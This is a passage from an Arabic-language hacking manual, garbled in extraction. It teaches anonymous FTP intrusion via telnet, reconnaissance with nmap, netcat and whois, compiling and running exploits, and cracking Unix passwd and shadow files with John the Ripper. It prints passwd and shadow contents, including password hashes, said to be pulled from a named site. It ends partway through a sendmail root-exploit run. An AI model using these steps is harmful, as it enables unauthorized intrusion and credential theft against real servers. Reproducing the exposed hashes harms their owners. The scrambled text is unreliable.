لك محتوى المجلد أو الھارد ديسك لكي يتضحGet

لكي تحمل الى سطح المكتب بتاع جھازك مثالexe.Get black Put یة العكسیة لالعملGet

من سطح المكتب بتاع جھازك و تضعه في يعني ان تأخد ملف في جھاز الضحیة

مثالexe.Put black

Close لقطع اإلتصال مع الضحیةسون تطرق على أنواع الرسائل الي نتحصل علیھا من ھدي أھم األوامر و اآلن

شرحھا و ارقامھا جھاز الضحیة أثناء تطبیق األوام و:Signification: sCode .Restart marker reply110 )nnn est un temps. (Service ready in nnn minutes120 .transfer starting; Data connection already open125 .about to open data connection; File status okay150 .Command okay200 .luous at this sitesuperf, Command not implemented202 .or system help reply, System status211 .Directory status212 .File status213 .Help message214 .NAME system type215 .Service ready for new user220 .Service closing control connection221

262

. gressno transfer in pro; Data connection open225 .Closing data connection226

).2p, 1p, 4h, 3h, 2h, 1h(Entering passive mode 227 .proceed, User logged in230 .completed, Requested file action okay250 .created" PATHNAME"257 .need password, User name okay331 .Need account for login332 .ested file action pendingfurther informationRequ350 .closing control connection, Service not available421 .t open data connection'Can425 .transfer aborded; Connection closed426

Fichier déjà utilisé par autre . (Requested file action not taken450 )chose .local error processing: quested action abordedRe451

Pas assez de mémoire pour exécuter . (Requested action not taken452 )action'l .command unrecognized, Syntax error500 .Syntax error in parameters or arguments501 .Command not implemented502 . of commandsBad sequence503 .Command not implemented for that parameter504 .Not logged in530 .Need account for storing files532

accès 'pas d, Fichier non trouvé. (Requested action not taken550 ...),possible

.page type unknown: Requested action aborded551

.ed file action abordedRequest552 )Nom de fichier non attribué. (Requested action not taken553

الطريقة على فكرة ھده الطريقة و اآلن أرجو ان اكون قد نجحت في شرح ھده يمكن ان تستعمل إلقتحام موقع كما تستعمل إلقتحام جھاز

263

االختراق عن طريق التلنت

Egypt_Mega:للكاتب

ماھو التلنت؟ كیفیة تشغیل التلنت؟

ما ھي بعض االوامر المستخدمة في التلنت؟ ..........خاتمة

:ماھو التلنت ھو عبارة عن أداة يتم تحمیلھا مع الويندوز وبواسطة ھذه األداه يتم االتصال

طريق بورت معین عن بین جھازين

: كیفیة تشغیل التلنت Telnetà--------- Runà---------Startروح لـ

Remote Systemà--------Connectھیفتحلك واجھه البرنامج ھتروح لـ اكتي اسم victim طبعا بدل Host Name com.victim.FTPھتكتب في خانة

WWWالموقع من غیر المفروض انك انت طبعا قبل كل حاجة Port جینا للنقطة المھمة وھي خانة

على موقع الضحیة وعارف ايه المنافذ المفتوحة وھديك Scannerعامل :دلوقتي ارقام النافذ

FTP -----------ß21 Telnet ---------< 23

smtp ----------- <25 whois <---------- 43 http ------------<80

3pop---------- <110 Imap-----------<143

ھیطلعلك رسالة تفیدك بان FTP وده بورت Port 21 خانة المھم تكتب في السیرفر جاھز

طیب دلوقتي عايزين ندخل للسیرفر ھنجیب يوزر وباسوورد منین متقلقش ھندخل في وضع التخفي شوف الطريقة دي ھتكتب الكالم اللى

ھقلھولك بس نش ھتشوف اللى بتكتب

264

اكتب User anonymous لعلك الرسالة دي وبعدين اضغط انتر ھیط

mail address as password-Send your complete e, Guest login Ok331 yahoo@Passبھد كده ھتكتب

@ طبعا ممكن تدي ايمیلك وممكن تدي اي حاجة فیھا رمز بعد كده ھیديك

Logged in Anonymously230 ) بتتغیر على حسب نوع السیرفیر( نا دلوقتي في السیرفیر لكن احنا عايزين نعمل خالص ابسط على االخر اح

PASVوصله عن طريق االمر ھتالقي آخر خانتین ودي خانة البورت وھنعمل Ipالموقع وبعد الـ IP ھیطعلك

دلوقتي عملیه حسابیه علشان نطلع البورت اللى ھندخل منه وھي نجیب .ع علیه الخانة التانیة والناتج يتجم256الخانة الولي من خانة البورت نضربھا في

256x20+12= 5132 ھنعمل العملیه دي)12,20,25,524,54204,(مثال Host Nameجديده بعد كده تكتب في خانة Telnetھتفتح خانة

com.Victim.FTP وبدلVictim 5132 اكتب اسم الموقع واكتب في خانةPort في الخانة االولى تدخل االمر وفي الخانة التانیهطبعا

ھیطله الناتج وھیتم قطه االتصال في النافذه التانیه بعد اي امر تروح للخانة جديد وتدخل Telnetتعمل العملیه الحسابیه وتفتح PASV االولى ودخل امر

اسم والبورت الجديد وطبعا بعد كدة معدش فیه حاجة غیر االامر

:وامر المستخدمة في التلنتبعض االLest الستعراض كل ما على السیرفر Get لسحب اي ملف من على السیرفیر Dirلعرض المفات التي على السیر فر Cdلالنتقال بین الملفات

.. Cdللرجوع الى الدلیل الذي يعلو الملف المتواجد فیه حالیا Sendاول تجربھا الرسال اي ملف للسیرفیر وھناك اوامر كتییره ح Putلوضع ملف معین على السیرفر

Pwdلمعرفة الدلیل المتواجد فیه انا على السیرفر Renameلتغیر اسماء ملفات على السیرفر

Rmdirلجذف ملف معین من السیر فر Mkdirلعمل ملف جديد على السیرفر

265

:الخاتمة

فكتابه كان عون لیه The oNeأشكركم جمیعا واشكر Mega Egyptتحیات وتقبلوا

BrUtE HaCk Team أي استفسارات ارجو مراسلتي على

com.yahoo@2003Egypt_Mega

266

اختراق المواقع

? كیف أجمع معلومات حول موقع~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

المشھوره nmap تستخدم صحكأن? أول خطوه تصلحھا ھي بورت سكان الموقع واألقواء على اإلطالق،يمكن أن تبحث عنھا ھذا إذا ما لقیتھا في

nmap/org.inscure.www://http أردت إذا? وھي تعمل على نظام لیونكسعلیك البحث عنھا في SuperScan ?برنامج يعمل على ويندوز انصحك بـ

ومن الممكن أن ? سوف تجد آالف المواقع التي تقدمھا لتنزيل ? اإلنترنتأصبحت اللغه محبوبه لدى Perl لغه? البحث لعملیه Perl تستخدم نصوص C جمیع الھاكر بعد مثال نصلح تجربه على الموقع? النتائج بعد الحصول على

/com.lem7.www://http للموقع بعض برامج البحث تطلب وضع رقم اآلي بي ? (لتعرف رقم اآلي بي ping والتقبل الدوماين عندھا إستخدم

- 514 - 513 - 143 - 110 - 37 - 25 - 23 - 22 - 21(البورتات ? تأتي النتائجوم بعملیه نزع التواقیع نق? أخرى لكن لن نھتم لھا ھنا ويوجد منافذ) 587

...للمنافذ

عملیه نزع التواقیع للمنافذ؟ ماھياإلتصال بھذا المنفذ فسوف عند? من المعروف أن المنفذ فتح من قبل تطبیق

وموقع ? وھو لتلنت23مثال لو إتصلت بالبورت ? يتم إرجاع رد الیك /com.lem7.www/:/http ويتضح ھذا من عملیه مسح ? توجد به خدمه تلنت

اإلتصال بخدمه اتلنت?المنافذ telnet /com.lem7.www://http

QNXو FreeBSD و SunOS و Linux و Windows يتم تنفیذ األمر التالي فيوھو ألن لینكس يوفر كل ماتحتاجه ? عنھا Linuxولكن أفضل ? بنفس الصیغه

تأتي نتیجه ? لذلك لن أذكرھا Linux ال يختص بـ ھذا المستند...من أدوات التلنت اإلتصال بسیرفر الحلم على بورت

----------------------

.7 5SunOS ----------------------login :

267

علیك أن تنتزع التواقیع بقي5S SunO 7.?يتضح بأن السیرفر يعمل على نظامإستخدم (لھا من البورتات المتبقیه لتعرف ما ھو التطبیق وإصدارته المنصت

وثم تقوم ببحث عن نقاط ضعف لھا وتحصل على شیفرات اإلستثمار? ) التلنت الخطوه التالیه ھي أن تعرف ما ھو ملقم الويب الذي يعمل على ? الخاصه بھا ھب الى الترمینال تبع لیونكس ونكتبنذ ? ھذا النظام

nc /com.lem7.www://http 80

---------------------- . . .

Server .* .31/Apache . . ----------------------

اتمنى أن? وقع أختصرت النتیجه وتم تضلیل إصدار ملقم الويب وذلك لحمايه الم ...تستطیع كشفه بنفسك

ھذا ? مفتوحین 25 ? 110من المعروف من عملیه السكان بورت بأن البورتین لمعرفه بالطبع ھذا يفیدك? يدل على أن في الموقع خدمة البريد اإللكتروني

pop ? smtp في(كل ماعلیك فعله ھو كتابه األمر التالي ? للموقع) Linux

com .lem7host

وأنتظر النتائج

بن الدن ولست عائش في جو تقنیه معلومات إذا كنت تعیش مع-:مالحظه (ما يسمیھا كثیر من الناس على حسب(كل ما علیك فعله ھو تفجیراإليمیل

أنه تم تغییر التوقیع عن إذا لم تجد في السیرفر خدمه تلنت أو-:مالحظه ثانیه األداة المفضله queso علیك أن تستخدم? الخ ....طريق مثال قرصنه النظام

إلستخدامھا علیك كتابه? وھي تعمل على لیونكس ? لكشف نظام التشغیل queso /com.elm7.www://http

268

وثم مسافه والموقع queso كل ماعلیك بعد تثبیت األداة في جھازك ھو كتابهيأتیك الرد ... والذي ھو بطبیعه الحال مفتوح في جمیع المواقع80قم البورت ور SunOS 5 7.النظام بأن

مثال net.alzeer.www://http/ لو أردت مثال قائمة بالبريدات الموجوده في موقع

support ( أو webmaster أو... info أو أدرت معرفه الـ) الخ DNS األوليأو من ھو الشخص اللي سجل ومعلومات عنه وما ھي ? للموقع والثانوي

تستطیع whois ?علیك بإستخدام خدمه ? الشركه التي تستظیف الموقع عن طريق أمر whois بیانات وتطلب معلومات من قواعد whois إستخدام خدمه

whois أكتب? في لینكس man whois إذا كنت ? زيد من المعلوماتلم تستخدم ويندوز أو أي بیئه أخرى أنصحك بالتوجه الى برمجیات السي جي آي

المتواجد في الموقعhtml.index/tools/org.psyon.www://http

السي جي آي التي تسھل لك مجموعه من برمجیات توفر لك ھذه الصفحهوھي whois موقع ويب بإستخدام ھناك رياضیات لطلب معلومات عن? المھمه

من التفاصیل على كل حال توجه الى الموقع التالي لمزيد? مفیده جدا Search+Google=btnG&whois=q?search/com.google.www://http

? كیف يتم كشف نقاط الضعف-

~~~~~~~~~~~~~~~~~~~~~~~~~~ ھذه للمغفلین ShadowSecurityScaner أو void eye برامج مثل ال تستخدم

يبغا يكون محترف ال يستخدم برامج في عملیات المحترفین واللي? !!فقطعملیه إختراق سیرفر تمتاز ? يخترق نه يبغاوال يخترق لمجرد أ? اإلختراق

السطو المحكمه ھي وكل عملیات? والتخطیط المحكم ? بالدقه المتناھیه برنامج لكن واهللا لو كنت من اللي يشغل? التي يصعب إكتشاف مرتكبیھا

ھذا لو قدرت ? ومايدري اهللا وين حاطه فصدقني إنك ماراح تفلح طول عمرك وتم اإلختراق بواحد من ھذه البرامج فسوف تصطاد فلو حدث? شئ تخترق

بسناره تماما كالسمكهنقاط الضعف المفضله والتي تعتبر كأسرار وال يكشف عنھا اال بعد فتره طويله

وكذلك نقاط الضعف الموجوده IIS ?أو Apache التي في ملقم الويب مثل ھيوده في البرنامج أو التي قد تكون موج PHP ?و Perl و CGI في سكربتات

وإذا كان في الموقع ? السي جي آي المستخدم لتفسیر نصوص البیرل أو? ضعف ھذا إذا وجدت به برنامج لتسوق مثال من الممكن أن تستغل فیه نقطه

كان أو..يعني اي شئ في السیرفر سوى كان سكربت بیرل أو سي جي آي

269

مصاب بنقطه ضعف من برنامج تنفیدي أو حتى نظام التشغیل أو ملقم الويب يعرض السیرفر لإلختراق ويعرض كل ما بداخله من أسرار الى الممكن أن المخترق

{ -nph/cgibin/de.fbunet.www://http} cgi .ھذا? CGI ھذه ? ال تستغرب

ھي الحركات الجديده لنشر ال

.... الموضوعنكمل

? وقد تم ذلك ? ھذا موقع يستحق التدمیر com . timduffالموقع: مثال لنأخذإرجاعه ولكن من جديد وال يحوي اال القلیل من الصفحات ال تتجاوز وھو اآلن تم

إثنتان

: - سوف أضع النقاط األساسیه لكشف نقاط ضعف على موقع ما اآلن الموجوده على السیرفرالخدمات التعرف على كافه1- وأي برمجیات أخرى مثل معرفه نظام التشغیل وإصدارته وكذلك ملقم الويب2-

الخ..... أو برنامج للبیع والشراء? مفسر نصوص بیرل إذا كان ذلك ممكن ? الموجوده في الموقع ) Cgi -Perl (عمل جلسه إللتقاط كل السكربتات3-

ھذا إذا وجد شئ منھا? البورت نقطه ضعف ألنه أحیانا يكون في? نسى تحط البورتات معھا والت4-

البرنامج في? نقطه الضعف لیست في البورت بعینه % 100لیس ھذا صحیحا (ھذا أقرب تعبیر لھا(اللي مصلح إنصات للبورت

اإلستفاده من المعلومات التي حصلت علیھا في البحث عن أخیرا يمكنك5- نقاط ضعف

? إستغالل نقاط الضعف المكتشفه مكنكیف ي-

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ أبسط الثغرات والتي يستطیع أي مبتدي أن يستخدمھا ھي تلك التي تنفذ من

مثل المثال السابق ذكره إلختراق الموقع? المتصفح خالل/com.timduff.www://http

270

من اآلن سوف نطلق إسم إستثمار على الطريقه(يكون اإلستثمار ? نوع آخر مكتوب ) كود(يكون اإلستثمار على شكل شفره ) التي تستغل بھا الثغره

وھو ما يسمى بالعربي برنامج الغالف وباإلنجلیزي? لیونكس في sh ببرنامجshell دتحت ملف باإلمتدا وتكون ھذه الشفرهsh *. وتعمل تحت بیئه لیونكس ?

المفضل ويحسس المخترق بالقوه ونظرا لتعدد وھذا النوع من اإلستثمارات ھوقويه فھي تقابل كتابه ملف دفعاتي اصبحت shell األداوت في لیونكس فإن لغه

) bat (في ويندوز

? المشھوره C مكتوب بلغه) كود(اإلستثمارات ثاني وھو شفره ويوجد نوع منقد تواجه كثیر من ? فیه أخطأ أثناء عملیه الترجمه وھذا النوع غالبا ما تحدث

ولترجمه ھذا النوع ? خلفیه في لغه سي المتاعب لذلك يجب أن تكون لديك gcc المترجم علیك بالذھاب الى لیونكس وترجمته بإستخدام

o Exploit -c .gcc Exploit c لو كان حرف.* C ?ولیس.* cللمف يجب أن يكون اإلمتداد( مالحظه مھمه

الشئ الثاني تأكد ++ ?كبتل فسوف يترجم اإلستثمار وكأنه كتب في سي )التي يتطلبھا اإلستثمار قبل تشغیله.*) h (من توفر المكتبات

يوجد نوع ظھر مؤخرا من اإلستثمارات وبداء ينتشر وھو أيضا شفره ولكن تشغیل ھذا النوع من موجه الدوس في ومن الممكن أن يتم Perl مكتوبه بلغه

)أن تملك برنامج يفسر شفرات البیرل مثل أكتیف بیرل يجب(ويندوز

.... من اإلستثمارات قد تكون على شكل خطوات وأحیرا انواع نادره

= Exploit إستثمار ؟ password file ماھو ملف كلمة المرور- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

الذي في داخله توجد حسابات ھو? ملف كلمة المرور معروف من إسمه مثل ھذا? األشخاص المرخص لھم بالدخول الى السیرفر

271

--------------------------------------------------------------------------------------

---------- : bin/usr::/:22:x:bin::/: 1:1:x:sh daemon/sbin:/:/User-Super::10:x:root

Line Printer ::871:x:lp: adm/var:/Admin::44:x:adm::/: :33:x:sysuucp ::55:x:uucp:/: Mail Daemon User::00:x:smtp: lp/spool/usr:/Adminuucp ::99:x:nuucp: uucp/lib/usr:/Admin

uucico /uucp/lib/usr:/uucppublic/spool/var:/Admin: nls/net/usr:/Network Admin::437:x:listen

No Access ::6000260002:x:noaccess:/: Nobody::6000160001:x:nobody:/: x Nobody.4SunOS ::6553465534:x:4nobody:/: User

csh /bin:/web::/:1001102:x:wwwmenu /mirrors/web:/mirrors/web::/:1001102:x:mirrors

ksh /bin:/sid/home/export::/:10103:x:sidsh /bin:/mirror/home::/:1104:x:mirrorsh /bin:/admin/home::/:1105:x:adminsh /bin:/erl/home::/:1102:x:sh erl/bin:/jerome/home::/:1106:x:jerome

ksh /bin:/landmark/web::/:10001000:x:landmark --------------------------------------------------------------------------------------

---------- حیث أن ھذا الملف الموضح باألعلى أختصر بشكل كبیر ? وقد تكون أكثر بكثیر

لیس كل ملفات كلمات المرور ? سحبه كان يحتوي على آالالف السطور فعند? على ? أسطر وھي الموجوده بكثره 10منھا من ال يتجاوز بھذا الحجم فیوجد

بأن ملف كلمة المرور ھو الذي في داخله توجد لحین علیك تعرفالعموم أنت ا ...... السیرفر حسابات األشخاص المرخص لھم بالدخول الى

? بماذا يفیدني ھذا الملف-

~~~~~~~~~~~~~~~~~~~~~~~~~~ لكي تقوم بإختراق الموقع يفیدك في معرفه كلمات السر وإسماء المستخدمین

? صحیحا تماما ال ھذا لیس? كلمة المرور تكون مشفره ...! ولكن التفرح ? كانت مشفره زمان ولكن في الوقت الحالي ھي مضلله

Shadowed سر مضلله كلمة x =او*

272

= U 9B1GekZ4EpGwكلمة سر مشفره على مقیاس? DES النوع من ھذا

وعدد من األنظمه األخرى ضعیف ? FreeBSDالتشفیر المستخدم في لیونكس حرف ورقم كبتل وسمول وال يحتوي من بینھا على 13دائما مكون من وھو?

ويندوز فھو يستخدم نوع آخر من التشفیر وھو نوع ضعیف بإستثناء? رمز ابدا أيضا

؟ password file معرفة كلمة السر من خالل ملف الباسورد كیف يمكن-

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

في القسم األيمن من لوحه المفاتیح لتقراء من الیسار الى Shift + Ctrlغطإضثم إذھب الى االعلى حیث وضعت مثال لملف كلمة مرور تم سحبه ? الیمین

com . hwwilson ...من الموقع : - تفسیر ھذا السطر

sh /sbin:/:/User-Super::10:x:root

root root الجذرھذا السطر يوضخ المستخدم واللي ھو

x

ال تفكر في x ?يعني مكانھا العالمة? ويتضح انھا مضلله ? وكلمة المرور لكن علیك البحث عن ملف ثاني تم تخزين فیه كلمة ? فھذا مستحیل كسرھا قلیل كیف تفعل ھذا ستعرف بعد? المرور

0

ھذا ھو رقم المستخدم 1

المجموعه رقم

273

sh /sbin:/:/User-Super

ھذا مش مھم shadowed (مضلل(وإذا كان encryption (مشفر(بین إذا كان الملف ماالفرق-

? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

! أو # أو x أو* يكون مكان كلمة المرور رمز مثل shadow file الملف المضلل

مثال لھا وھذا sh/sbin:/:/User-Super::10:x:root

المرور مكتوبه ولكن مشفره مثل ھذه لكن الملف المشفر تكون كلمةsh /sbin:/:/User-Super::10:KBZlvYSnVw71Q:root

KBZlvYSnVw 71 Qالمشفره ھي ھنا تكون كلمة المرور

.... اآلن طلعت الصوره صافیه

=========== ? كیف يتم كسره? وماذا لو كان ملف كلمة المرور مشفر -

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ويوجد آخر بإسم john the ripper و a .05 Crackكثیره وأشھرھا ھو البرامج? jack the ripper علیك ? إذا كنت ممن يجیدون العمل في لیونكس فھذا جید

? لمن يريد إستخدام ويندوز john the ripper وأفضل a 5 Crack ?تنزيل ..... لیونكس عمل أيضا تحت john the ripper ه فإنوللمعولمی

: - طريقه عمل ھذه البرامج

كما ھو موضح ? بمطابقه الكلمات الموجوده به ويقوم wordlist يقدم للبرنامج . ھنا

--------------------------------------------------------------------------------------

------<R 2LPq9wrtUo2 Q\ ----------

274

أخذ / 1/ | المشفره مع | /--- /كلمة المرور} البدايه | //>---} يتم مقارنه| المختاره حتى / _____________0/ | الكلمات wordlist كلمة من الـ

التطابق / \---- | word list |0 / ---- -- - -- ^--- -- -- - يتم | | / 1/ }تشفیر{-<oUBz 1ct6LiJ6Qالكلمة المختاره/ --- /رور مشفره كلمة م | \ ------song-------- //------------------|_____________| إذا حدث تطابق

يعني أن فھذا كلمة المرور التي كانت مشفره

.. قد كسرت | -------------------------------------------------------------------------------|

يتم عمل دوره مثل الموضحه في األعلى لكسر كلمات المرور - :مالحظه مھمه بسرعه المشفره

بسرعه على معالجjohn the ripperإختبرنا( تجربه في الثانیه 5000} | النھايه}700)

-------------------------------------------------------------------------------|

من واجه دوس نكتب األمر التاليr john the rippeلتشغیل

ordlist passwd -john الكلمات ھو ملف القاموس الذي يحتوي على عدد كبیر من wordlist حیث

ھو الملف الذي يحتوي على كلمات المرور المشفره والتي نود passwd و معرفتھا

--------------------------------------------------------------------------------------

98 Microsoft® Windows .( 1998-1981Copyright Microsoft Corp )C

txt .wasswd passwd-john >john the ripper\junk\Desktop\:E

1996 Copyright © .3 1John the Ripper Version ,97by Sola

password 1 Loaded

DONE : *****w6401 : s/ c%:01 99:00:000: t6401 : c0 : v**

275

john the ripper \junk\Desktop\:E> --------------------------------------------------------------------------------------

? الموجود في نفس الدايروكتري pot . johnوسوف تحفظ النتیجه في الملفكسر جديده ويمكنك تغییر حذف ھذا الملف إذا أردت البدء في عملیه وعلیك

... مكان آخر بدل من حذفه إذا كنت ترى ذلك إسمه أو نقله في

أو بالعربي القوه brute force تسمى بـ ھناك طريقه اخرى للكسر وھيتقوم بتجربه كل الحروف واألرقام ھي wordlist ?وھي ال تحتاج لملف? العنیفه

حتى تصیب كلمة الخ..ع وخمس خانات وارب3?والرموز مع بعض في خانتان معك فذلك لن يأخذ wordlist وأنا افضل ان تستخدم ملفات? المرور الصحیحه

في اال ثواني فقط ألن عملیه التجربه الموضحه في الرسم باألعلى ذكرت بأنه إذا لم تفلح ملفات? كلمة في الثانیه 5000تجربه الكلمات يتجاوز سرعة

wordlist القوه العنیفهإذھب الى حینھا brute force السابق brute force طريقه يستخدم john the ripper األمر التالي يجعل

ذكرھا

i passwd -john

إذا قمت بتجربه ھذه ? كلمة المرور المراد كسره ھو ملف passwd حیث ... البرنامج لترى الى أين توصل الطريقه إضغط إنتر أثناء عمل

? علي ان أعمل ماذا? ف كلمة المرور مضلل ولو كان مل-

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ Unshadow لكن ھناك طريقه تسمى? سوف تواجه كلمة مرور مضلله دائما

!! لحل ھذه المشكلهملف (إذا واجھت ملف مضلل علیك البحث عن ملف ثاني يسمى ملف الشادو

( shadow fileالظلذا الملف يوجد في امكنه معینه وكل نظام تشغیل له مكان يوضع به ھذا وھ

: الیك الجدول التالي ? الملف

276

= * shadow token /etc: /Linux = shadow token /etc: /SunOS يأخذ أشكال متعدده اشھرھا ھو *

= * shadow token /etc/passwd or .master/etc: /FreeBSD والجديد ھو x x = shadow token /etc: /X IRI

= ! passwd token /security/etc: /AIX = * shadpw token /etc/shadow or /etc: /ConvexOS

token تعني الرمز الذي يوجد في الملف? passwd يفید في تسھیل وھذا

كلمة بدل كلمه المرور فھذا يعني ان! يعني لو مثال لقیت عالمه ? المھمه لقد إستعنت بالجدول السابق / passwd /security/etc ?سجله فيالمرور م

أكرر ملف شادو ھو الملف الذي تخزن فیه كلمة (مثال على ملف شادو ? ذكره )المرور الصحیحه

shadow ھذا ملف

-------------------------------------------------------------------------------------- ----------

:::::: 6445:NP:sys:::::: 6445:NP:bin:::::: 11390:U9B1GekZ4EpGw:root :::::: 10935:Ovcvsc6VMm8z9:admin#:::::: 10935:VoRlLHM6IyEDQ:adm

:::::: 6445:NP:lp --------------------------------------------------------------------------------------

---------- كلمات السر موجودهنالحظ ان

shadow passwd مع passwd file الخطوه األخیره وھي دمج ملف الباسورد

...ذكرھا لنحصل على ملف متكامل ونقدمه الى برامج الكسر السابق

ھذا ملف باسورد حصلنا علیه منpasswd/etc/com.hwwilson.2sonwebwil://http

-------------------------------------------------------------------------------------- ---------- : bin/usr::/:22:x:bin::/: :11:x:sh daemon/sbin:/:/User-Super::10:x:root

e Printer Lin::871:x:lp: adm/var:/Admin::44:x:adm::/: :33:x:sysuucp ::55:x:uucp:/: Mail Daemon User::00:x:smtp: lp/spool/usr:/Adminuucp ::99:x:nuucp: uucp/lib/usr:/Admin

277

uucico /uucp/lib/usr:/uucppublic/spool/var:/Admin: nls/net/usr:/Network Admin::437:x:listen

No Access :0002:660002:x:noaccess:/: Nobody::6000160001:x:nobody:/: x Nobody.4SunOS ::6553465534:x:4nobody:/: User

csh /bin:/web::/:1001102:x:wwwmenu /mirrors/web:/mirrors/web::/:1001102:x:mirrors

ksh /bin:/sid/home/export::/:10103:x:sidsh /bin:/mirror/home::/:1104:x:mirrorh s/bin:/admin/home::/:1105:x:admin

sh /bin:/erl/home::/:1102:x:sh erl/bin:/jerome/home::/:1106:x:jeromeksh /bin:/landmark/web::/:10001000:x:landmark

-------------------------------------------------------------------------------------- ----------

ل الجدول السابق ذكره بأن نعرف من خال x الموضح واللي ھو token ومن الـ / shadow /etcالمرور الصحیحه في الدلیل كلمة

إذن نتوجه بالمتصفح الى

shadow/etc/com.hwwilson.2wilsonweb://http

الملف لنحصل على--------------------------------------------------------------------------------------

---------- :::::: 6445:NP:daemon:::::: 10643:AiUKMRcKQ4XOT:root:::::: 6445:NP:lp:::::: 6445:NP:adm:::::: 6445:NP:sys:::::: 6445:NP:bin:::::: 6445:NP:nuucp:::::: 6445:NP:uucp:::::: 6445:NP:smtp:::::: 6445:NP:noaccess:::::: 6445:NP:nobody*::::::: LK:*listen:::::: :105072rcSe8.WJctaI:www:::::: 6445:NP:4nobody:::::: 10515:stXldZKnujFYo:sid:::::: 10911:MY1kwGw5.p9gg:mirrors:::::: 10601:k4gB.iMPWwbrU:mirror:::::: 10976:YYKyWgQw5hDhB:admin:::::: 10982:aJYeI4Xem9jE0:erl:::::: 10976:tPoGo32XDqnOl:jerome

:::::: 11185:s0g8vl6jCgWu0:landmark --------------------------------------------------------------------------------------

----------

278

في ملف x نقوم بنسخ كلمات السر الموجوده فیه ولصقھا مكان عالمهع جمیع الحسابات لنحصل على ملف كلمة مرور كامل وھكذا م ? الباسورد

... الكسر ومتكامل ونقدمه الى برامج

279

)الجزء االول(كیفیة االختراق

Mega Egypt:للكاتب

اوال الموضوع ھو كیفیة اختراق المواقع بطريقة عامة وقد قمت بجعل الموضوع قسمین

Apacheكیفیة اختراق سیرفرا : االول Windowsالتى تعمل تحت انظمة IIS اختراق سیرفرات كیفیة: الثاني

Apacheواالن ساتطرق الى الجزء االول وھو كیفیة اختراق سیرفرات _____________________________________________________

:االحتايجات

Cygwinاو شیل اكاونت او برنامج Linuxنظام -1 nmapبرنامج -2 netcatبرنامج -3

____________________________________________________

وعند الذھاب الى موقع COM.MSN.WWWعندما تريد اختراق موقع ولیكن com.netcraft.www لمعرف IP ونظام التشغیل وبعض المعلومات االخرى

ينجد الت Linux:نظام التشغیل -12- IP :160.8.8.1 Apache: سیرفر -3

طیب نعمل ايه nmapنقوم بعمل سكان بــ: اوال

nmapكیفیة تنزيل 1- gz.tar.tar zxvf nmap 2- cd nmap 3- configure&&make&&make install

280

man nmapاذا اردت معلومات عمن البرنامج اكتب

scanاالن سنقوم بعمل 160.8.8.1vv –O –sT –ap Nm

ستظھر معلومات مشابھة

Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Host localhost.localdomain (160.8.8.1) appears to be up ... good.

Initiating Connect() Scan against localhost.localdomain (160.8.8.1) Adding open port 23/tcp

Adding open port 6000/tcp Adding open port 22/tcp

Adding open port 1027/tcp Adding open port 111/tcp

The Connect() Scan took 1 second to scan 1601 ports. For OSScan assuming that port 22 is open and port 1 is closed and

neither are firewalled Interesting ports on localhost.localdomain (127.0.0.1):

(The 1596 ports scanned but not shown below are in state: closed) Port State Service

22/tcp open ssh 23/tcp open telnet

111/tcp open sunrpc 25/tcp open smtp

6000/tcp open X11 Remote operating system guess: Linux Kernel 2.4.0 - 2.5.20

OS Fingerprint: TSeq(Class=RI%gcd=1%SI=26D8DB%IPID=Z%TS=100HZ)

T1(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW)

T2(Resp=N)

281

T3(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW)

T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)

T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)

PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

Uptime 0.007 days (since Sat Oct 5 01:12:31 2002)

TCP Sequence Prediction: Class=random positive increments Difficulty=2545883 (Good luck!)

TCP ISN Seq. Numbers: CF9FF245 CF78E942 CFD91AAE D0406C91 D0535F65 D05E00C1

IPID Sequence Generation: All zeros

Nmap run completed -- 1 IP address (1 host up) scanned in 5 seconds

:شرح ماھو مكتوب :اوال االمر

sT - يحدد TCP كوسیلة للفحص وھي االسھل واالكثر انتشارا بیت المخترقین النھا ال تحتاج صالحیات

O - لتحديد نظان التشغیل vv -عن العملیات التي يقوم بھا البرنامج وتكتب مرتین لزيادة لعرض معلومات

كثافة المعلومات

:ثانیا مخرجات البرنامج يخبرنا البرنامج بوجود بورتات مفتوحة

25 ورقم البورت smtpولكن مانريده ھو smtpاالن سنقوم باالتصال بالموقع عن طريق

سنقوم بكتابة

282

25 160.8.8.1telnet علومات مشابھة لالتيستظھر م

160.8.8.1Connected to Escape character is

0- 04:09:18 2005 jun 24linux :9.10.0/9.6.3 ESMTP send mail 160.8.8.1 40) EDT(

quit closing connecting 160.8.8.1

connentin closed by foreigen host

:تفسیر المكتوب 0.109./69.. 3 اصدارة Smtpان

ماذا افعل االن البحث عن اكسبلويت عن ھذه االصدارة

perlاو C ++ او cھو برنامج مكتوب بلغة : اوال االكسبلةويت com.securityfocusعن طريق موقع : كیفیة الحصول على اكسبلويت

com.securiteamاو

كل ماعلیك ھو كتابة الثغرة المراد الدخول منھا ونظام التشغیل Ok c .Smtpعلنا واحد ولیك طل

دلوقتي نريد رفع االكسبلوبت للموقع للحصول على صالحیات روت عن طريق االمر

.3.2.10 196s -t - smtp# /~:IcEr@root

ھتطلعلك حاجات زي دي : Target160.8.8.1 ftp/>shellcode< :with smtp from) ?(.2 6RedHat rpm : Shellcode, 028xbfffb0: drRetAddrAd, 08075844x0: Return Address

152 loggin into system..

USER ftp 331 mail address as password-send your complete e, Guest login ok.

283

PASS> shellcode< 230-mail address as your password-Next time please use your e 230 - com.egypt@mega: for example 230 access restrictions apply, login okGuest.

: magic number already exists, Skipping: 2 STEP ,04:02,01:01,02:03,0187[[

Checking if we can reach our return address by format string: 3 STEP C me ^028 xbfffb0if it is not (028 xbfffb0: Ptr address test: 4 STEP now(

